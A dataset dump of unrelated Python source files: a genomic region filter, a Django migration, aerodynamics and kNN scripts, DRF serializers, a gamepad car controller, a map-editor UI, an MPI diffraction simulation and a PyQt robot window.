text stringlengths 38 1.54M |
|---|
#!/usr/bin/env python3
import re, sys, os, shutil
from subprocess import call
def isValidRegion(region):
    """Return True if *region* splits into exactly three non-empty parts
    on ':' and '-' (i.e. looks like '[+/-]chrom:start-end')."""
    # BUG FIX: on Python 3 filter() returns an iterator, so len(filter(...))
    # raised TypeError; materialize the non-empty parts in a list instead.
    parts = [p for p in re.split('[:-]', region) if p]
    return len(parts) == 3
def read_frag(frag):
    """Parse a fragment string '[+/-]chrom:start-end' into a dict with keys
    'dir' ('+' or '-'), 'chr', 'start' and 'end'.

    BUG FIX: on Python 3 the filter object could not be unpacked reliably,
    and start/end were kept as strings, so later range comparisons were
    lexicographic ('9' > '100').  Coordinates are now ints.
    """
    chrom, start, end = [p for p in re.split('[:-]', frag) if p]
    strandiness = '-' if frag[0] == '-' else '+'
    return {'dir': strandiness,
            'chr': chrom,
            'start': int(start),
            'end': int(end)}
def is_in_region(region, frag):
    """True if *frag* lies on the same chromosome/strand as *region* and is
    either fully contained in it or fully spans it.

    Both arguments are dicts as produced by read_frag().
    """
    if frag['chr'] == region['chr'] and frag['dir'] == region['dir']:
        # fragment completely inside the region
        if frag['start'] >= region['start'] and frag['end'] <= region['end']:
            return True
        # fragment completely covers the region
        if frag['start'] < region['start'] and frag['end'] > region['end']:
            return True
    # BUG FIX: the original fell off the end and returned None implicitly
    return False
def is_in_any_region(regions, el):
    """True if any fragment listed in log line *el* falls in any of *regions*.

    *el* is a tab-separated line 'plotfile\\t[frag,frag,...]\\tchroms'; the
    fragment list is stripped of its surrounding brackets before parsing.

    BUG FIX: the original used the removed Python-2 builtin reduce(), and
    crashed on an empty pair list; any() handles both and short-circuits.
    """
    plotfile, frags, chroms = el.split('\t')
    frag_dicts = [read_frag(f) for f in frags[1:-1].split(',')]
    return any(is_in_region(r, f) for r in regions for f in frag_dicts)
def matching_files(filename, regions):
    """Return the plot-file names (first tab field) of all lines in *filename*
    whose fragments intersect any of the textual *regions*.

    BUG FIX: on Python 3 the original returned lazy map/filter objects that
    read from the file *after* the 'with' block closed it; the matching is
    now fully evaluated while the file is open.
    """
    region_maps = [read_frag(r) for r in regions]
    with open(filename, 'r') as inFile:
        return [line.split('\t')[0]
                for line in inFile
                if is_in_any_region(region_maps, line)]
if __name__ == '__main__':
    if len(sys.argv) < 2:
        # BUG FIX: the usage line had an unformatted %s placeholder, and the
        # second line misspelled '--multistrand'
        print('Usage: %s region [region region ...] [--multistrand|--circular,--copy]' % sys.argv[0])
        print('\n--multistrand or --circular will only look for respective events')
        print('--copy copy findings to subfolder "myfindings/"')
        print('--viz create plots with GraphViz')
        exit(1)
    # Python 3: filter() yields lazy iterators; use lists so 'in' tests and
    # len() below behave
    regions = [arg for arg in sys.argv[1:] if arg[:2] != '--']
    flags = [arg for arg in sys.argv[1:] if arg[:2] == '--']
    if '--circular' in flags and '--multistrand' in flags:
        # asking for both is the same as asking for neither
        flags = [f for f in flags if f not in ('--circular', '--multistrand')]
    # all() replaces the Python-2 builtin reduce() (removed in Python 3)
    if not all(isValidRegion(r) for r in regions):
        print('Error: Invalid region definitions.')
        print('Required: [+/-][chromosome-name]:[start-position]-[end-position]')
        print(' -X:100-21313')
        exit(-1)
    results = matching_files('pressspan.log', regions)
    if '--circular' in flags:
        results = [r for r in results if r.startswith('circ')]
    elif '--multistrand' in flags:
        results = [r for r in results if r.startswith('mult')]
    print("Found %d results matching your criteria" % (len(results)))
    if '--copy' in flags and len(results) > 0:
        result_dir = 'myfindings'
        print('Creating folder %s and copying files...' % (result_dir))
        if not os.path.exists(result_dir):
            os.makedirs(result_dir)
        for rfile in results:
            rfile += '.dot'
            prefix = 'circulars/' if rfile.startswith('circ') else 'multis/'
            try:
                shutil.copyfile(prefix + rfile, result_dir + '/' + rfile)
            except IOError:
                print('ERROR: Could not copy file %s%s' % (prefix, rfile))
    if '--viz' in flags:
        result_dir = 'mygraphs'
        if not os.path.exists(result_dir):
            os.makedirs(result_dir)
        for rfile in results:
            prefix = 'circulars/' if rfile.startswith('circ') else 'multis/'
            try:
                call(['dot', '-Teps',
                      prefix + rfile + '.dot',
                      '-o', result_dir + '/' + rfile + '.eps'])
            except OSError:
                # narrowed from a bare except: only a missing/unrunnable
                # 'dot' binary is expected here
                print('ERROR: Could not complete call to dot. Is GraphViz installed?')
|
import os
# pyctdev supports both pip and conda "ecosystems"; default to conda when the
# caller has not chosen one explicitly.
if "PYCTDEV_ECOSYSTEM" not in os.environ:
    os.environ["PYCTDEV_ECOSYSTEM"] = "conda"
from pyctdev import * # noqa: api
def task_pip_on_conda():
    """Experimental: provide pip build env via conda"""
    commands = [
        # some ecosystem=pip build tools must be installed with conda when using conda...
        'conda install -y pip twine wheel "rfc3986>=1.4.0"',
        # ..and some are only available via conda-forge
        'conda install -y -c conda-forge tox "virtualenv<=20.4.7"',
    ]
    return {'actions': commands}
def _build_dev(channel):
channels = " ".join(['-c %s' % c for c in channel])
return "conda build %s conda.recipe/ --build-only" % channels
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-11-03 04:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds the PHHistory model and sets a default
    of '0' on the tank decimal fields and on temphistory.temperature."""

    dependencies = [
        ('api', '0006_auto_20171103_0219'),
    ]

    operations = [
        # New time-series table of pH readings, one row per measurement.
        migrations.CreateModel(
            name='PHHistory',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tank_id', models.IntegerField()),
                ('modified_date', models.DateTimeField(auto_now=True)),
                ('ph', models.DecimalField(decimal_places=2, max_digits=5)),
            ],
        ),
        # NOTE(review): default='0' is a string; Django coerces it for
        # DecimalField, but Decimal('0') would be more explicit.
        migrations.AlterField(
            model_name='tank',
            name='ammonia_max',
            field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
        ),
        migrations.AlterField(
            model_name='tank',
            name='ammonia_min',
            field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
        ),
        migrations.AlterField(
            model_name='tank',
            name='last_ammonia',
            field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
        ),
        migrations.AlterField(
            model_name='tank',
            name='last_ph',
            field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
        ),
        migrations.AlterField(
            model_name='tank',
            name='ph_max',
            field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
        ),
        migrations.AlterField(
            model_name='tank',
            name='ph_min',
            field=models.DecimalField(decimal_places=2, default='0', max_digits=5),
        ),
        migrations.AlterField(
            model_name='temphistory',
            name='temperature',
            field=models.DecimalField(decimal_places=2, max_digits=5),
        ),
    ]
|
"""
Cruise Analysis
Call CruiseAnalysis(V_Cruise,W,S,rh0,CLa,CL0) to obtain Cruise CL,and the
required alpha given motocalc and AVL/XFLR5 lift slope info.
"""
import numpy as np
from matplotlib import pyplot as plt
from scipy.interpolate import UnivariateSpline
from scipy.optimize import fsolve
rho = 1.225  # sea-level air density [kg/m^3]
#alpha given in deg.
# Measured thrust curve (first propeller): airspeed [m/s] vs thrust [N].
V = [0.00,2.00,4.00,6.00,8.00,10.0,12.0,14.0,15.0,16.0]
T = [6.50,6.25,6.00,5.75,5.50,5.20,4.80,4.40,4.20,3.8]
#Interpolate the thrust curve:
V_interp = np.arange(0,16.0,0.1) #Arbitrarily set.
T_interp = np.interp(V_interp,V,T)
T_spline = UnivariateSpline(V,T)
# 10x5 propeller data.
# NOTE(review): the two assignments below overwrite T_interp/T_spline, so only
# the 10x5 curve is actually used downstream — confirm this is intentional.
V_10x5 = [0, 2, 4, 6, 8, 10, 12, 14, 15.0,15.5]
T_10x5 = [8.2, 7.8, 7.4, 6.95,6.3, 5.55,4.6, 3.6,2.95,2.65]
T_interp = np.interp(V_interp,V_10x5,T_10x5)
T_spline = UnivariateSpline(V_10x5,T_10x5)
def get_thrust_available(v):
    """Spline-interpolated available thrust [N] at airspeed v [m/s]."""
    return T_spline(v)
class CruiseSolver():
    """
    Solves for the trimmed cruise state (angle of attack and velocity),
    balancing lift against weight and thrust against drag.
    Relies on the module-level density `rho` and thrust curve.
    """

    def __init__(self, M, S, b, cl0, cla, cd0=0.04, e=0.8):
        self.W = M * 9.81                         # weight [N]
        self.b = b                                # wing span [m]
        self.S = S                                # reference area [m^2]
        self.cl0 = cl0                            # zero-alpha lift coefficient
        self.cla = cla                            # lift-curve slope
        self.cd0 = cd0                            # parasite drag coefficient
        self.e = e                                # Oswald efficiency factor
        self.AR = b**2 / S                        # aspect ratio
        self.K = 1 / (self.AR * self.e * np.pi)   # induced-drag factor

    def get_cruise_alpha(self, v):
        """Angle of attack giving lift == weight at speed v."""
        required_cl = 2 * self.W / (rho * v**2 * self.S)
        return (required_cl - self.cl0) / self.cla

    def get_cruise_v(self, alpha):
        """Speed giving lift == weight at the given angle of attack."""
        cl = self.cl0 + alpha * self.cla
        return np.sqrt((2 * self.W) / (rho * self.S * cl))

    def compute_drag(self, alpha, v):
        """Total drag (parasite + induced) at this alpha and speed."""
        cl = self.cl0 + alpha * self.cla
        drag_coeff = self.cd0 + self.K * cl**2
        return drag_coeff * 0.5 * rho * v**2 * self.S

    def thrust_differential(self, alpha):
        """Excess thrust T - D along the trimmed (L == W) flight condition."""
        v = self.get_cruise_v(alpha)
        return get_thrust_available(v) - self.compute_drag(alpha, v)

    def solve_cruise_alpha(self):
        """Root-find the alpha where thrust balances drag; return (alpha, v)."""
        alpha = fsolve(self.thrust_differential, 0.2)
        return alpha, self.get_cruise_v(alpha)[0]
def cruise_residual(m, v_cruise, s_ref, cl0, cla, alpha):
    """Residual of the lift == weight balance at cruise (weight minus lift)."""
    lift = 0.5 * 1.225 * v_cruise**2 * s_ref * (cl0 + cla * alpha)
    return 9.81 * m - lift
def alpha_cruise(V_Cruise,W,S,CLa,CL0):
    """Return (CL, alpha) required for steady level flight at V_Cruise.

    CL comes from the lift-equals-weight balance; alpha from inverting the
    linear lift curve (same angle units as CLa).
    """
    required_cl = CL_Cruise(W, S, V_Cruise)
    required_alpha = CruiseAlpha(CL0, CLa, required_cl)
    return (required_cl, required_alpha)
def CL_Cruise(W,S,V_Cruise):
    """Lift coefficient for L == W at V_Cruise (uses module-level rho)."""
    dynamic_pressure_area = S * rho * V_Cruise**2
    return 2 * W / dynamic_pressure_area
def CruiseAlpha(CL0,CLa,CL):
    """Invert the linear lift curve CL = CL0 + CLa*alpha for alpha."""
    return (CL - CL0) / CLa
def maxSpeedWithThrust(CD0,b,S,CLa,CL0,alpha,e=0.8):
    """Locate the speed where the drag curve meets the available-thrust curve.

    Uses the module-level V_interp/T_interp thrust data.  Returns
    (Vmax, T_res) where T_res = D - T at the crossing (thrust residual).
    Note: an earlier version multiplied alpha by pi/180 here; the caller is
    expected to pass alpha in the units matching CLa.
    """
    aspect_ratio = b**2 / S
    induced_factor = 1 / (np.pi * e * aspect_ratio)
    cl = CL0 + CLa * alpha
    # drag force over the whole interpolated speed range
    drag_curve = (CD0 + induced_factor * cl**2) * S * 0.5 * rho * V_interp**2
    # the crossing is where |T - D| is smallest
    gap = abs(T_interp - drag_curve)
    crossing = np.argmin(gap)
    return V_interp[crossing], drag_curve[crossing] - T_interp[crossing]
if __name__ == '__main__':
    # --- max-speed check against the interpolated thrust curve ---
    CD0 = 0.04
    b = 1.2333
    S = 0.519
    #CLa = 0.0524*180/np.pi
    CLa = 0.04965
    CL0 = 0.0483
    alpha = 3.6
    # BUG FIX: the Python-2 `print expr` statement form is a SyntaxError on
    # Python 3; print() works on both.
    print(maxSpeedWithThrust(CD0, b, S, CLa, CL0, alpha))
    # --- cruise CL / alpha for the design point ---
    V_Cruise = 14.9  # m/s (from motoCalc)
    W = 1.622 * 9.8  # weight [N]
    S = 0.5193  # m**2
    rh0 = 1.225
    rho = 1.225
    CLa = 3.2659
    CL0 = -0.02
    # BUG FIX: the original unpacked into the name CL_Cruise, shadowing the
    # CL_Cruise() function defined above; use a distinct local name.
    cl_cruise, alphaCruise = alpha_cruise(V_Cruise, W, S, CLa, CL0)
    print(cl_cruise, alphaCruise)
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 28 09:52:01 2020
@author: Joash
"""
import numpy as np
from os import listdir
import knn as K
def img2vector(filename):
    """Read a 32x32 text image of digit characters into a (1, 1024) vector.

    Each of the first 32 lines contributes its first 32 characters, parsed
    as individual ints, laid out row-major.
    """
    returnVect = np.zeros((1,1024))
    # BUG FIX: the original opened the file and never closed it; 'with'
    # guarantees the handle is released even on a parse error.
    with open(filename) as fr:
        for i in range(32):
            lineStr = fr.readline()
            for j in range(32):
                returnVect[0,32*i+j] = int(lineStr[j])
    return returnVect
# ---- build the training set from the trainingDigits folder ----
hwLabels = []  # class label (digit) for each training sample
trainingFileList = listdir('trainingDigits') # file names in the training folder
m = len(trainingFileList)
trainingMat = np.zeros((m,1024))
for i in range(m):
    fileNameStr = trainingFileList[i] # one file name, e.g. '3_12.txt'
    fileStr = fileNameStr.split('.')[0]
    classNumStr = int(fileStr.split('_')[0])  # digit label is encoded before the '_'
    hwLabels.append(classNumStr)
    trainingMat[i,:] = img2vector('trainingDigits/%s' % fileNameStr)
# ---- classify each test sample with k-NN and count errors ----
testFileList = listdir('testDigits')
errorCount = 0.0
numTest = len(testFileList)
for i in range(numTest):
    fileNameStr = testFileList[i]
    fileStr = fileNameStr.split('.')[0]
    classNumStr = int(fileStr.split('_')[0])
    vectorUnderTest = img2vector('testDigits/%s' % fileNameStr) # read one test sample
    classifierResult = K.knn(vectorUnderTest,trainingMat,hwLabels,3) # classify with k = 3
    print("KNN得到的辨识结果是:%d,实际值是:%d" % (classifierResult,classNumStr))
    if (classifierResult != classNumStr):
        errorCount += 1.0
print("\n辨识错误数量为:%d" % errorCount)
print("\n辨识率为:%f %%" %((1-errorCount/float(numTest))*100)) # %% escapes a literal % in the format string
#print("\n辨识率为: %f %" % ((1-errorCount/float(numTest))*100))# reference code
from newsfeed_member import models
from rest_framework import serializers
from member import serializers as member_serializers
class NewsfeedType(serializers.ModelSerializer):
    """Serializer exposing the NewsfeedType lookup table."""
    # pylint: disable=too-few-public-methods
    class Meta(object):
        # pylint: disable=too-few-public-methods
        model = models.NewsfeedType
        fields = ('id', 'name', 'description', 'updated', 'created')
class Newsfeed(serializers.ModelSerializer):
    """Serializer for newsfeed entries, embedding the member serializers.

    NOTE(review): this uses DRF 2-era API — `serializers.Field` and a
    `source=` equal to the field name are rejected by DRF 3+.  Confirm the
    pinned rest_framework version before upgrading.
    """
    # pylint: disable=too-few-public-methods
    # human-readable event type (slug on the related NewsfeedType's name)
    event_type = serializers.SlugRelatedField(
        source='event_type',
        slug_field='name',
        read_only=True)
    member = member_serializers.Member(source='member') # noqa # pylint: disable=no-value-for-parameter, unexpected-keyword-arg
    club_id = serializers.Field(source='club.id')
    status_update_id = serializers.Field(source='status_update.id')
    subject_member = member_serializers.Member(source='subject_member') # noqa # pylint: disable=no-value-for-parameter, unexpected-keyword-arg
    class Meta(object):
        # pylint: disable=too-few-public-methods
        model = models.Newsfeed
        fields = ('id', 'member', 'club_id', 'event_type', 'status_update_id',
                  'subject_member', 'time')
|
from car import Car
from controller import Controller
def map_from_to(x, a, b, c, d):
    """Linearly remap *x* from the range [a, b] onto the range [c, d]."""
    fraction = (x - a) / (b - a)
    return fraction * (d - c) + c
class CarController(Controller):
    """Maps PS-style gamepad events onto Car actions: R1 limiter, L1
    regulator toggle, R2 throttle, L2 reverse, R3 steering."""

    def __init__(self, **kwargs):
        Controller.__init__(self, **kwargs)
        self.car = Car(controller_connected=self.is_connected)
        # raw analog axis range reported by the controller
        self.min_value = -32767
        self.max_value = 32767

    # R1 for limiter
    def on_R1_press(self):
        """Engage the speed limiter at the current speed."""
        self.car.limiter = self.car.speed
        self.car.regulator.clear()

    # L1 for regulator
    def on_L1_press(self):
        """Toggle the cruise regulator; enabling it releases the limiter."""
        if self.car.regulator.is_set():
            self.car.regulator.clear()
            return
        self.car.regulator.set()
        self.car.limiter = -1

    # R2 for throttle
    def on_R2_press(self, value):
        """Throttle proportional to trigger travel, capped by the limiter."""
        if not self.car.regulator.is_set():
            self.car.speed = map_from_to(value, self.min_value, self.max_value, 0.2, 1)
        if self.car.limiter == -1:
            target = self.car.speed
        else:
            target = min(self.car.speed, self.car.limiter)
        self.car.throttle(target)

    def on_R2_release(self):
        self.car.stop()

    # L2 for reverse
    def on_L2_press(self, value):
        """Reverse proportional to trigger travel."""
        amount = map_from_to(value, self.min_value, self.max_value, 0.2, 1)
        self.car.reverse(amount)

    def on_L2_release(self):
        self.car.stop()

    # R3 for steering
    def on_R3_x_at_rest(self):
        """Stick centred: straighten the steering."""
        self.car.steer(0)

    def on_R3_left(self, value):
        angle = map_from_to(value, 0, self.min_value, 0, self.car.steering_servo.min_angle)
        self.car.steer(angle)

    def on_R3_right(self, value):
        angle = map_from_to(value, 0, self.max_value, 0, self.car.steering_servo.max_angle)
        self.car.steer(angle)
|
import wx
import os
from typing import List, Dict, Callable, Union, Tuple, Any, Type, TYPE_CHECKING
import importlib
import pkgutil
import traceback
from amulet.api.errors import LoaderNoneMatched
from amulet import world_interface
from amulet_map_editor import log
from amulet_map_editor.amulet_wx.ui.simple import SimplePanel
from amulet_map_editor.amulet_wx.ui.select_world import WorldUI
if TYPE_CHECKING:
from amulet.api.world import World
# Shape of the nested menu specification passed through the `menu` hooks:
# top-level menu name -> section -> entry name -> callback, optionally
# packed in a tuple with extra data.
MenuData = Dict[
    str, Dict[
        str, Dict[
            str, Union[
                Callable,
                Tuple[Callable],
                Tuple[Callable, str],
                Tuple[Callable, str, Any],
            ]
        ]
    ]
]
# this is where most of the magic will happen
_extensions: List[Tuple[str, Type['BaseWorldProgram']]] = []  # filled lazily by load_extensions()
_fixed_extensions: List[Tuple[str, Type['BaseWorldProgram']]] = []  # statically registered pages (e.g. About)
def load_extensions():
    """Populate the _extensions registry exactly once.

    Seeds it with the statically registered _fixed_extensions, then scans the
    modules of this package for an `export` dict whose 'ui' entry is both a
    BaseWorldProgram and a wx.Window subclass.
    """
    if not _extensions:
        _extensions.extend(_fixed_extensions)
        for _, name, _ in pkgutil.iter_modules([os.path.join(os.path.dirname(__file__))]):
            # load module and confirm that all required attributes are defined
            module = importlib.import_module(f'amulet_map_editor.programs.{name}')
            if hasattr(module, 'export'):
                export = getattr(module, 'export')
                if 'ui' in export and issubclass(export['ui'], BaseWorldProgram) and issubclass(export['ui'], wx.Window):
                    # fall back to a placeholder name if the module omits one
                    _extensions.append((export.get('name', 'missingno'), export['ui']))
class BaseWorldUI:
    """No-op default implementation of the world-UI lifecycle hooks."""

    def disable(self):
        # called when this UI is hidden; default does nothing
        pass

    def enable(self):
        # called when this UI is shown; default does nothing
        pass

    def close(self):
        # called when this UI is destroyed; default does nothing
        pass

    def menu(self, menu: MenuData) -> MenuData:
        # subclasses may extend the menu spec; the base returns it unchanged
        return menu
class WorldManagerUI(wx.Notebook, BaseWorldUI):
    """Notebook that owns one loaded world and hosts a page per extension."""

    def __init__(self, parent: wx.Window, path: str, close_self_callback: Callable[[], None]):
        super().__init__(parent, style=wx.NB_LEFT)
        self._path = path
        self._close_self_callback = close_self_callback
        try:
            self.world = world_interface.load_world(path)
        except LoaderNoneMatched as e:
            # no format loader recognised the path; tear down the half-built widget
            self.Destroy()
            raise e
        self.world_name = self.world.world_wrapper.world_name
        self._extensions: List[BaseWorldProgram] = []
        self._last_extension: int = -1
        self._load_extensions()
        self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self._page_change)

    @property
    def path(self) -> str:
        """Filesystem path of the loaded world."""
        return self._path

    def menu(self, menu: MenuData) -> MenuData:
        """Add the 'Close World' entry, then let the active extension extend the menu."""
        # BUG FIX: the original bound `lambda evt: self._close_self_callback`,
        # which merely *returned* the callback object, so the menu item did
        # nothing; the callback must be invoked.
        menu.setdefault('&File', {}).setdefault('exit', {}).setdefault(
            'Close World', lambda evt: self._close_self_callback())
        return self._extensions[self.GetSelection()].menu(menu)

    def _load_extensions(self):
        """Load and create instances of each of the extensions"""
        load_extensions()
        select = True
        for extension_name, extension in _extensions:
            try:
                ext = extension(self, self.world, self._close_self_callback)
                self._extensions.append(ext)
                self.AddPage(ext, extension_name, select)
                select = False  # only the first successfully-loaded page starts selected
            except Exception as e:
                log.exception(f'Failed to load extension {extension_name}\n{e}\n{traceback.format_exc()}')
                continue

    def is_closeable(self) -> bool:
        """Check if all extensions are safe to be closed"""
        return all(e.is_closeable() for e in self._extensions)

    def close(self):
        """Close the world and destroy the UI.
        Check is_closeable before running this."""
        for ext in self._extensions:
            ext.close()
        self.world.close()

    def _page_change(self, evt):
        """Disable the page being left and enable the newly selected one."""
        if self.GetSelection() != self._last_extension:
            # NOTE(review): on the very first change _last_extension is -1, so
            # this disables the *last* extension rather than the initial page;
            # preserved as-is — confirm intended before changing.
            self._extensions[self._last_extension].disable()
            self._extensions[self.GetSelection()].enable()
            self.GetGrandParent().create_menu()
            self._last_extension = self.GetSelection()

    def disable(self):
        self._extensions[self.GetSelection()].disable()

    def enable(self):
        self._extensions[self.GetSelection()].enable()
        self.GetGrandParent().create_menu()
class BaseWorldProgram:
    """Base class for the per-world editor programs; subclasses override as needed."""

    def enable(self):
        """Run when the panel is shown/enabled"""
        pass

    def disable(self):
        """Run when the panel is hidden/disabled"""
        pass

    def is_closeable(self) -> bool:
        """
        Check if it is safe to close the UI.
        If this is going to return False it should notify the user.
        :return: True if the program can be closed, False otherwise
        """
        return True

    def close(self):
        """Fully close the UI. Called when destroying the UI."""
        pass

    def menu(self, menu: MenuData) -> MenuData:
        # extend and return the shared menu spec; base leaves it unchanged
        return menu
class AboutExtension(SimplePanel, BaseWorldProgram):
    """Landing page for an opened world: summary widget plus a
    'Close World' button."""

    def __init__(self, container, world: 'World', close_self_callback: Callable[[], None]):
        SimplePanel.__init__(
            self,
            container
        )
        self.world = world
        self._close_self_callback = close_self_callback
        # button that closes the whole world tab via the owner's callback
        self._close_world_button = wx.Button(self, wx.ID_ANY, label='Close World')
        self._close_world_button.Bind(wx.EVT_BUTTON, self._close_world)
        self.add_object(self._close_world_button, 0, wx.ALL | wx.CENTER)
        self.add_object(
            wx.StaticText(
                self,
                label='Currently Opened World: '
            ), 0, wx.ALL | wx.CENTER
        )
        # summary panel describing the loaded world
        self.add_object(
            WorldUI(self, self.world.world_wrapper), 0, wx.ALL | wx.CENTER
        )
        self.add_object(
            wx.StaticText(
                self,
                label='Choose from the options on the left what you would like to do.\n'
                      'You can switch between these at any time.\n'
                      '<================='
            ), 0, wx.ALL | wx.CENTER
        )

    def _close_world(self, evt):
        """Button handler: delegate to the owner's close callback."""
        self._close_self_callback()

# register the About page as an always-present extension
_fixed_extensions.append(("About", AboutExtension))
|
import os
import sys
import time
import numpy as np
import scipy as sp
import h5py as h5
from mpi4py import MPI # module required to use MPI
import argparse
import skopi as sk
from skopi.util import asnumpy, xp
# set up MPI environment
comm = MPI.COMM_WORLD # communicator shared by all ranks
size = comm.Get_size() # number of processors available
rank = comm.Get_rank() # this process's rank, always in [0, size-1]
def main():
    """Master/worker MPI simulation driver.

    Rank 0 builds the experiment, broadcasts the detector/beam/particle, and
    collects diffraction patterns from the workers into an HDF5 file; ranks
    1..size-1 generate patterns and send them to rank 0.
    """
    # parse user input
    params = parse_input_arguments(sys.argv)
    pdb = params['pdb']
    geom = params['geom']
    beam = params['beam']
    numParticles = int(params['numParticles'])
    numPatterns = int(params['numPatterns'])
    outDir = params['outDir']
    saveName = params['saveNameHDF5']  # NOTE(review): unused — the output name below is hard-coded
    data = None
    if rank == 0:
        print ("====================================================================")
        print ("Running %d parallel MPI processes" % size)
        t_start = MPI.Wtime()
        # load beam
        beam = sk.Beam(beam)
        # load and initialize the detector
        det = sk.PnccdDetector(geom=geom, beam=beam)
        # create particle object(s)
        particle = sk.Particle()
        particle.read_pdb(pdb, ff='WK')
        experiment = sk.SPIExperiment(det, beam, particle)
        f = h5.File(os.path.join(outDir,"sim_data.h5"),"w")
        f.attrs['numParticles'] = numParticles
        experiment.volumes[0] = xp.asarray(experiment.volumes[0])
        experiment.volumes[0] = xp.asarray(experiment.volumes[0])  # NOTE(review): duplicate of the line above (idempotent)
        dset_volume = f.create_dataset("volume", data=experiment.volumes[0], compression="gzip", compression_opts=4)
        data = {"detector": det, "beam": beam, "particle": particle}
        print ("Broadcasting input to processes...")
    # every rank receives the objects constructed on rank 0
    dct = comm.bcast(data,root=0)
    if rank == 0:
        # master: allocate the output datasets, then receive until all patterns arrive
        pattern_shape = det.pedestals.shape # (4, 512, 512)
        dset_intensities = f.create_dataset("intensities", shape=(numPatterns,)+pattern_shape, dtype=np.float32, chunks=(1,)+pattern_shape, compression="gzip", compression_opts=4) # (numPatterns, 4, 512, 512)
        dset_photons = f.create_dataset("photons", shape=(numPatterns,)+pattern_shape, dtype=np.float32, chunks=(1,)+pattern_shape, compression="gzip", compression_opts=4)
        dset_positions = f.create_dataset("positions", shape=(numPatterns,)+(numParticles, 3), dtype=np.float32, chunks=(1,)+(numParticles, 3), compression="gzip", compression_opts=4)
        dset_orientations = f.create_dataset("orientations", shape=(numPatterns,)+(numParticles, 4), chunks=(1,)+(numParticles, 4), compression="gzip", compression_opts=4)
        dset_pixel_index_map = f.create_dataset("pixel_index_map", data=det.pixel_index_map, compression="gzip", compression_opts=4)
        dset_pixel_position_reciprocal = f.create_dataset("pixel_position_reciprocal", data=det.pixel_position_reciprocal, compression="gzip", compression_opts=4)
        print ("Done creating HDF5 file and dataset...")
        n = 0
        while n < numPatterns:
            # blocking receive of one finished pattern from any worker
            status1 = MPI.Status()
            (ind, img_slice_intensities, img_slice_positions, img_slice_orientations) = comm.recv(source=MPI.ANY_SOURCE,status=status1)
            i = status1.Get_source()
            print ("Rank 0: Received image %d from rank %d" % (ind,i))
            dset_intensities[ind,:,:,:] = np.asarray(img_slice_intensities)
            dset_photons[ind,:,:,:] = det.add_quantization(img_slice_intensities)
            dset_positions[ind,:,:] = np.asarray(img_slice_positions)
            dset_orientations[ind,:,:] = np.asarray(img_slice_orientations)
            n += 1
    else:
        # worker: rebuild the experiment from the broadcast pieces
        det = dct['detector']
        beam = dct['beam']
        particle = dct['particle']
        experiment = sk.SPIExperiment(det, beam, particle)
        # round-robin the pattern indices over the size-1 workers
        for i in range((rank-1),numPatterns,size-1):
            img_slice = experiment.generate_image_stack(return_intensities=True, return_positions=True, return_orientations=True, always_tuple=True)
            img_slice_intensities = img_slice[0]
            img_slice_positions = img_slice[1]
            img_slice_orientations = img_slice[2]
            # synchronous send: blocks until rank 0 has received this pattern
            comm.ssend((i,img_slice_intensities,img_slice_positions,img_slice_orientations),dest=0)
    if rank == 0:
        t_end = MPI.Wtime()
        print ("Finishing constructing %d patterns in %f seconds" % (numPatterns,t_end-t_start))
        f.close()
    sys.exit()
def parse_input_arguments(args):
    """Parse the command line into a plain dict of options.

    *args* is the full argv including the program name (e.g. sys.argv).

    BUG FIX: the original did `del args[0]`, destructively mutating the
    caller's list (typically sys.argv); the program name is now skipped
    locally instead.
    """
    parse = argparse.ArgumentParser()
    parse.add_argument('-p', '--pdb', type=str, help='PDB file')
    parse.add_argument('-g', '--geom', type=str, help='psana geometry file')
    parse.add_argument('-b', '--beam', type=str, help='beam file defining X-ray beam')
    parse.add_argument('-m', '--numParticles', type=int, help='number of particles')
    parse.add_argument('-n', '--numPatterns', type=int, help='number of diffraction patterns')
    parse.add_argument('-o', '--outDir', default='', type=str, help='output directory')
    parse.add_argument('-s', '--saveNameHDF5',default='saveHDF5_parallel.h5',type=str, help='filename for image dataset')
    # convert argparse to dict
    return vars(parse.parse_args(args[1:]))
# entry-point guard: run the simulation only when executed directly
if __name__ == '__main__':
    main()
|
import sys, random
from PyQt4 import QtGui, QtCore
# Robot Widget
class RobotLink(QtGui.QWidget):
    """One robot link, rendered as an ellipse filling the widget rect."""

    def __init__(self, parent, x, y, width, height, fill):
        super(RobotLink, self).__init__(parent)
        self._fill = fill      # brush pattern used to paint the ellipse
        self._rotation = 0     # not read anywhere in this class yet
        self.setGeometry(x, y, width, height)

    def paintEvent(self, e):
        """Qt paint hook: delegate the drawing to drawLink."""
        link_painter = QtGui.QPainter()
        link_painter.begin(self)
        self.drawLink(link_painter)
        link_painter.end()

    def drawLink(self, painter):
        """Draw the link outline and fill across the full widget area."""
        painter.setPen(QtGui.QColor(0, 0, 0))
        painter.setBrush(self._fill)
        painter.drawEllipse(0, 0, self.width(), self.height())
# Window
class Window(QtGui.QWidget):
    """Main PaintBot window: hosts the three robot links and paints the
    workspace / control-panel background."""

    # Default Constructor, sets up the window GUI
    def __init__(self):
        super(Window, self).__init__()
        self.initUI()

    def initUI(self):
        """Create the robot links, then size and title the window."""
        self._link1 = RobotLink(self, 10, 10, 100, 50, QtCore.Qt.DiagCrossPattern)
        self._link2 = RobotLink(self, 100, 100, 50, 100, QtCore.Qt.Dense5Pattern)
        self._link3 = RobotLink(self, 150, 150, 50, 50, QtCore.Qt.Dense2Pattern)
        self.setGeometry(300, 300, 800, 600)
        self.setWindowTitle("CSCE 452 - PaintBot")

    def paintEvent(self, e):
        """Repaint the static background on every paint event."""
        super(Window, self).paintEvent(e)
        painter = QtGui.QPainter()
        painter.begin(self)
        self.drawBoundingBoxes(painter)
        painter.end()

    # Draws the boxes that define the robots workspace and
    # the control panel
    def drawBoundingBoxes(self, painter):
        color = QtGui.QColor(0, 0, 0)
        color.setNamedColor("#cccccc")
        painter.setPen(color)
        # Draw the robot workspace
        painter.setBrush(QtGui.QColor(255, 255, 255))
        painter.drawRect(10, 10, 500, 578)
        # Draw the control panel workspace
        painter.setBrush(QtGui.QColor(150, 150, 150))
